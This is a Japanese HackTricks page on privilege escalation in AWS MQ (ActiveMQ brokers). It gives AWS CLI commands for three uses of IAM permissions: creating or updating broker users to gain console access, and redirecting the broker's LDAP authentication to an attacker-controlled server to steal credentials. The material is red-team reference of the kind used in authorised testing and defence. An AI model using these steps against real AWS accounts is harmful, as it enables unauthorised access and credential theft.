AWS - MQ Privesc

Reading time: 4 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

MQ

MQに関する詳細情報は、以下を確認してください:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

これらの権限を使用すると、ActiveMQブローカーに新しいユーザーを作成できます(これはRabbitMQでは機能しません):

bash
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

潜在的な影響: ActiveMQを通じて機密情報にアクセスする

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

これらの権限を持つことで、ActiveMQブローカーに新しいユーザーを作成することができます(これはRabbitMQでは機能しません):

bash
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

潜在的な影響: ActiveMQを通じて機密情報にアクセス

mq:ListBrokers, mq:UpdateBroker

ブローカーがActiveMQLDAPを使用して認証している場合、攻撃者が制御するLDAPサーバーに使用される設定変更することが可能です。これにより、攻撃者はLDAPを通じて送信されるすべての資格情報を盗むことができます。

bash
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

もしActiveMQで使用されている元の認証情報を見つけることができれば、MitM攻撃を実行し、認証情報を盗み、元のサーバーでそれを使用し、レスポンスを送信することができます(盗まれた認証情報を再利用するだけでこれを行うことができるかもしれません)。

潜在的な影響: ActiveMQの認証情報を盗む

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする